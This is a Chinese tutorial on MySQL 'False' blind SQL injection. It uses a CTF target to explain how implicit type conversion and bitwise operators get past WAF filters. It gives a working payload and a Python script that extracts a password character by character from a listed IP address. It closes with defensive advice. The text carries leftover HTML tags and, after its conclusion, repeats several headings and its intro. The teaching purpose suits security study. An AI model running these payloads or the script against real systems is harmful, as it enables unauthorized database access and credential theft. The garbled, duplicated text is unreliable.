False盲注基础原理与实战教学<\/h1>

0×01 前言<\/h2>
False盲注是一种可以绕过某些WAF(Web应用防火墙)的SQL注入技术，由于其特殊性容易被忽视。本文将通过CTF实例详细讲解False盲注的原理、应用场景和实战技巧。<\/p>

0×02 False注入原理<\/h2>

False盲注的核心原理基于MySQL的隐式类型转换机制：<\/p>

当字符串与数字进行比较时，MySQL会尝试将字符串转换为浮点数<\/li>
字符串转换时会产生warning，转换结果为0<\/li>

例外情况：如果字符串以数字开头，则会截取数字部分进行转换<\/li> <\/ol>

关键点：<\/p>

'admin' = 0<\/code> 在MySQL中为真(True)<\/li>

这种特性可以用于构造布尔型盲注条件<\/li>
<\/ul>
0×03 关键函数与运算符<\/h2>
常用函数<\/h3>

MID(column_name,start[,length])<\/code>：从指定位置提取字符串

由于空格被过滤，可使用from<\/code>语法：mid((password)from(1))<\/code><\/li>
<\/ul>
<\/li>
ASCII()<\/code>：返回字符的ASCII码值<\/li>
substr()<\/code>：字符串截取函数(本例中未使用)<\/li>
<\/ol>
可用运算符<\/h3>
当常见运算符被过滤时，可考虑以下替代方案：<\/p>

位运算符：|<\/code>(位或)、&<\/code>(位与)、^<\/code>(位异或)<\/li>
算术运算符：+<\/code>、-<\/code>、*<\/code>、\/<\/code>、%<\/code><\/li>
<\/ul>
优先级注意：按位或(|<\/code>)的优先级高于赋值(=<\/code>)，所以先执行位运算再赋值<\/p>
0×04 实战案例分析<\/h2>
目标环境<\/h3>

URL: http:\/\/118.89.219.210:49167\/index.php<\/li>
过滤内容：空格、%0a、\/**\/、and、union等<\/li>
可用运算符：|<\/code>、&<\/code>、^<\/code><\/li>
<\/ul>
注入原理详解<\/h3>
构造payload：<\/p>
username=<\/span>admin<\/span>'|(ascii(mid((password)from(1)))>53)#&password=sd
<\/span><\/span><\/span><\/code><\/pre>解释：<\/p>

admin'<\/code> 被隐式转换为0<\/li>
(ascii(mid((password)from(1)))>53)<\/code> 是一个布尔条件，结果为True(1)或False(0)<\/li>
使用位或运算：0|0=0，0|1=1<\/li>
当username=0时，返回查询字段的所有数据(前提是username字段没有以数字开头的记录)<\/li>
<\/ol>
判断条件<\/h3>
通过页面返回的不同响应(如"password error")来判断条件是否为真<\/p>
自动化脚本<\/h3>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/118.89.219.210:49167\/index.php"<\/span>
<\/span><\/span>r =<\/span> requests.<\/span>Session()
<\/span><\/span>result =<\/span> ''<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(1<\/span>, 33<\/span>):  # 假设密码长度为32<\/span>
<\/span><\/span>    for<\/span> j in<\/span> range(37<\/span>, 127<\/span>):  # 可打印字符的ASCII范围<\/span>
<\/span><\/span>        payload =<\/span> "admin'|(ascii(mid((password)from(<\/span>{0}<\/span>)))><\/span>{1}<\/span>)#"<\/span>.<\/span>format(str(i), str(j))
<\/span><\/span>        data =<\/span> {"username"<\/span>: payload, "password"<\/span>: "psdvs"<\/span>}
<\/span><\/span>        print(payload)
<\/span><\/span>        html =<\/span> r.<\/span>post(url, data=<\/span>data)
<\/span><\/span>        if<\/span> "password error"<\/span> in<\/span> html.<\/span>content:
<\/span><\/span>            result +=<\/span> chr(j)
<\/span><\/span>            print(result)
<\/span><\/span>            break<\/span>
<\/span><\/span>
<\/span><\/span>print(result)
<\/span><\/span><\/code><\/pre>0×05 绕过技巧扩展<\/h2>
运算符替代方案<\/h3>


构造0的方法：<\/p>

+<\/code>：0+0=0<\/code><\/li>
-<\/code>：0-0=0<\/code><\/li>
*<\/code>：0*1=0<\/code><\/li>
\/<\/code>：' '\/1=0<\/code><\/li>
%<\/code>：' '%1=0<\/code><\/li>
<\/ul>
<\/li>

比较运算符替代：<\/p>

=<\/code>被过滤时可使用like<\/code>或regexp<\/code><\/li>
><\/code>和<<\/code>被过滤时可使用greatest()<\/code>\/least()<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
字符串截取替代<\/h3>

mid(str from pos)<\/code>：避免使用空格<\/li>
substring(str from pos)<\/code><\/li>
left(str, len)<\/code>\/right(str, len)<\/code><\/li>
<\/ul>
0×06 防御建议<\/h2>

使用参数化查询(prepared statements)<\/li>
严格限制输入类型和范围<\/li>
对所有用户输入进行过滤和转义<\/li>
避免在SQL查询中使用动态拼接<\/li>
实现最小权限原则，限制数据库用户权限<\/li>
<\/ol>
0×07 总结<\/h2>
False盲注是一种利用MySQL隐式类型转换特性的注入技术，特别适用于某些WAF绕过场景。通过理解其原理和掌握相关函数、运算符的使用方法，安全研究人员可以更好地测试和防御这类漏洞。在实际应用中，建议结合自动化工具提高效率，同时也要注意合法合规地进行安全测试。<\/p>

False盲注基础原理与实战教学<\/h1>

0×01 前言<\/h2> False盲注是一种可以绕过某些WAF(Web应用防火墙)的SQL注入技术，由于其特殊性容易被忽视。本文将通过CTF实例详细讲解False盲注的原理、应用场景和实战技巧。<\/p>

0×03 关键函数与运算符<\/h2>

判断条件<\/h3> 通过页面返回的不同响应(如"password error")来判断条件是否为真<\/p>

0×05 绕过技巧扩展<\/h2>

0×01 前言<\/h2>
False盲注是一种可以绕过某些WAF(Web应用防火墙)的SQL注入技术，由于其特殊性容易被忽视。本文将通过CTF实例详细讲解False盲注的原理、应用场景和实战技巧。<\/p>

判断条件<\/h3>
通过页面返回的不同响应(如"password error")来判断条件是否为真<\/p>